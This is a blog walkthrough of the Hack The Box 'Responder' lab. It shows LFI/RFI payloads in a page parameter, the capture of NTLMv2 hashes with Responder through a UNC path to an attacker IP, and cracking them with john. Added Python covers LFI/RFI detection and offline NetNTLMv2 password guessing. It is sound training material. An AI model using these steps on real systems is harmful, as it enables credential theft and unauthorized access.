Responder writeup

Task 1


When visiting the web service using the IP address, what is the domain that we are being redirected to?

Answer : unika.htb

Add this hostname to your /etc/hosts like this : HTB_MACHINE_IP unika.htb

Task 2


Which scripting language is being used on the server to generate webpages?

Answer : php

PHP (Hypertext Preprocessor) is a widely-used, open-source scripting language designed for web development. It is embedded within HTML and is especially suited for creating dynamic and interactive websites.

PHP can interact with databases, handle forms, and generate content on the fly. It is server-side, meaning the code is executed on the server before the result is sent to the user's browser. PHP is known for its simplicity, flexibility, and extensive community support.

Task 3


What is the name of the URL parameter which is used to load different language versions of the webpage?

[Screenshot: responder_1]

Answer : page

Task 4


Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "/desktop/../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Answer : /desktop/../../../windows/system32/drivers/etc/hosts

TLDR : LFI means the application can be made to read, and potentially execute, files that already exist on the server.

Test it yourself : http://unika.htb/index.php?page=/desktop/../../../windows/system32/drivers/etc/hosts

Task 5


Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "/desktop/../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Answer : //10.10.14.6/somefile

TLDR : RFI means the application can be made to include, and potentially execute, files hosted on a remote server. This can lead to unauthorized access, execution of malicious code, or other security issues.

Here the web server could read/download/open/display a potentially malicious file from 10.10.14.6 (in this example).
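As an added example (not part of the original writeup), the following Python classifies the four candidate values from Tasks 4 and 5 the way an unrestricted include() would treat them, shows the allowlist-based resolver that closes both holes, and runs the same check over a few constructed Apache-style access-log lines to show what the probing looks like to a defender. TEMPLATE_DIR, ALLOWED_PAGES and the log lines are assumptions for the demo, not taken from the box.

```python
import os
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed layout of the site (hypothetical, not taken from the box): the language
# templates live in TEMPLATE_DIR and only the names in ALLOWED_PAGES may be included.
TEMPLATE_DIR = os.path.realpath("/var/www/unika/templates")
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}

_REMOTE = re.compile(r"^(//|\\\\|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)  # UNC path or URL
_DRIVE = re.compile(r"^[a-zA-Z]:")                                       # C:\... on Windows


def classify_page_value(value: str) -> str:
    """Label a raw ?page= value the way an unrestricted include() would treat it."""
    v = unquote(value)                     # also catches double-encoded probes
    if _REMOTE.match(v):
        return "rfi"                       # fetched from another host (UNC/WebDAV/HTTP)
    parts = v.replace("\\", "/").split("/")
    if ".." in parts or v.startswith(("/", "\\")) or _DRIVE.match(v):
        return "lfi"                       # escapes the template directory
    if v in ALLOWED_PAGES:
        return "allowlisted"
    return "unknown"                       # not a template; the include would just fail


def safe_resolve(value: str) -> Optional[str]:
    """Hardened replacement for include($_GET['page']): allowlist first, then confine
    the resolved path to TEMPLATE_DIR as a second line of defence."""
    if value not in ALLOWED_PAGES:
        return None
    path = os.path.realpath(os.path.join(TEMPLATE_DIR, value))
    if os.path.commonpath([path, TEMPLATE_DIR]) != TEMPLATE_DIR:
        return None
    return path


# Combined-format access log pattern (only the fields the scan needs).
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, page_value, label) for requests whose page= parameter
    looks like LFI or RFI probing: the detection side of Tasks 4 and 5."""
    findings = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)
        for value in query.get("page", []):
            label = classify_page_value(value)
            if label in ("lfi", "rfi"):
                findings.append((m["ip"], value, label))
    return findings


# Constructed sample log lines (not real traffic from the box).
SAMPLE_LOG = [
    '10.10.14.6 - - [12/Jan/2025:10:00:01 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 1234',
    '10.10.14.6 - - [12/Jan/2025:10:00:05 +0000] "GET /index.php?page=/desktop/../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '10.10.14.6 - - [12/Jan/2025:10:00:09 +0000] "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1" 200 0',
    '10.10.14.6 - - [12/Jan/2025:10:00:12 +0000] "GET /index.php?page=minikatz.exe HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, value, label in scan_access_log(SAMPLE_LOG):
        print(f"{label.upper()} from {ip}: page={value}")
```

The allowlist is the real fix: once only known template names are accepted, neither the traversal string nor the UNC path ever reaches include(), so the PHP settings (allow_url_include, open_basedir) become defence in depth rather than the only barrier.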

Task 6


What does NTLM stand for?

Answer : New Technology Lan Manager

NTLM (NT LAN Manager) is a Microsoft authentication protocol used to authenticate users in a Windows network environment. It is a challenge-response mechanism that relies on hashing to verify credentials.

NTLM has known vulnerabilities and is considered less secure compared to newer protocols like Kerberos. It is often used for backward compatibility with older systems. Despite its flaws, NTLM is still prevalent in many legacy systems and networks.

Task 7


Which flag do we use in the Responder utility to specify the network interface?

Responder was already installed on my Kali, otherwise get it here : Responder

Next, you need to know which interface to use: here we want the one corresponding to the OpenVPN tunnel you created to connect to HTB. On a recent Kali you can see its IP address on the taskbar:

[Screenshot: responder_2]

It is usually the tun0 interface, which you can check with: ip a | grep tun0

[Screenshot: responder_3]

We see the same IP address, so this is the right interface.

Start Responder on it: sudo responder -I tun0

[Screenshot: responder_4]

It waits and listens on this interface for requests.

Using the RFI identified earlier, we make the server look for a file (even if it doesn't exist) on our side:

[Screenshot: responder_5]

The web server makes a request to access somefile on our host. Responder replies to that request, pretending to be the requested resource. As part of NTLM authentication the web server then sends another request to authenticate to our machine, and this request includes an NTLMv2 hash derived from the user's credentials:

[Screenshot: responder_6]

Answer : -I

Responder is a network tool used to capture and manipulate authentication traffic on a network. It exploits weaknesses in protocols like LLMNR, NBT-NS and mDNS (all of them used by NTLM) to capture credentials or perform relay attacks. Often used in penetration testing, Responder can trick devices into sending authentication data to the attacker's machine.

Task 8


There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

Answer : John The Ripper

John the Ripper is a widely used open-source password cracking tool. It employs various attack methods like dictionary and brute-force attacks to crack hashed passwords. It supports numerous hash algorithms, including DES, MD5, and SHA.

Users can customize cracking strategies with various options and configuration files. It is often used for security testing and auditing.

Task 9


What is the password for the administrator user?

[Screenshot: responder_7]

Answer : badminton

Here, I am using john with the rockyou wordlist and passing it the NTLMv2 hash we obtained previously. One of the nice features of john is that, when possible, it automatically detects the hash format: you can see here that it knows it is dealing with an NTLMv2 hash (line 3 of the screenshot).
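To make concrete what Responder captured in Task 7 and what john is doing in Task 9, here is an added Python example (not from the writeup, nor from the Responder or john projects) that computes a NetNTLMv2 response as specified in MS-NLMP, writes it out in the colon-separated line Responder logs and john/hashcat consume, and then recovers the password from that line by recomputing the response for each wordlist candidate, which is the offline check that makes a single captured exchange enough to guess against. The server challenge, blob, user name and domain are constructed values, and the three-entry wordlist stands in for rockyou; the MD4 routine is included because recent OpenSSL builds no longer expose it to hashlib.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_block(state, block: bytes):
    """One 64-byte MD4 compression step (RFC 1320): three rounds of 16 operations."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(16):                                    # round 1, function F
        f = (b & c) | (~b & d)
        a = _rotl((a + f + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                    # round 2, function G
        g = (b & c) | (b & d) | (c & d)
        k = (i % 4) * 4 + i // 4
        a = _rotl((a + g + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        a, b, c, d = d, a, b, c
    order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for i in range(16):                                    # round 3, function H
        h = b ^ c ^ d
        a = _rotl((a + h + X[order[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        a, b, c, d = d, a, b, c
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    """MD4 digest: OpenSSL when the build still exposes it, otherwise pure Python."""
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:
        pass
    padded = data + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(padded), 64):
        state = _md4_block(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash (MS-NLMP NTOWFv1): MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) || domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob). The client sends this
    16-byte value followed by the blob; that pair is what Responder writes to its log."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, "md5").digest()


def responder_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The user::domain:challenge:proof:blob form that john and hashcat (mode 5600) read."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_responder_line(line: str) -> dict:
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def offline_guess(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """What john does at scale: recompute NTProofStr per candidate and compare. Note
    that no further contact with either machine is needed once the line exists."""
    h = parse_responder_line(line)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"]):
            return candidate
    return None


# Constructed capture (values made up for the demo, not taken from the box).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00000000")
CAPTURED_LINE = responder_line("Administrator", "RESPONDER", SERVER_CHALLENGE,
                               nt_proof("badminton", "Administrator", "RESPONDER", SERVER_CHALLENGE, BLOB), BLOB)

if __name__ == "__main__":
    print(CAPTURED_LINE)
    print("recovered:", offline_guess(CAPTURED_LINE, ["123456", "password", "badminton"]))
```

Two things worth noticing from the code: the only secret input is the NT hash of the password, so the cost of a guess is two HMAC-MD5 calls and the wordlist size sets the outcome (hence rockyou finding a weak password in seconds); and the response is bound to a challenge the attacker's own Responder supplied, which is why stopping the outbound SMB/WebDAV exchange at the perimeter and retiring NTLM in favour of Kerberos removes the problem rather than merely making it slower.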

Task 10


We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?

[Screenshots: responder_8, responder_9]

Answer : 5985

This task is a good occasion for another piece of advice: every time you start a new box, run an Nmap scan in the background while you do other things. The -vv switch makes Nmap report each open port as soon as it finds it.

For example, in this case it first identified the web service on port 80 (which we used in the earlier questions), so you can work on that while the scan continues.

Task 11


Submit root flag

Port 5985 is the well-known port of WinRM (Windows Remote Management). If you look it up on your favourite search engine you'll find a well-known tool called Evil-WinRM, which lets you remotely execute commands and interact with a Windows system over the WinRM service.

[Screenshot: responder_10]

Easy reverse shell!

[Screenshot: responder_11]

Answer : Get your own !

JeeZy Blog

© 2024-2025 JeeZy Blog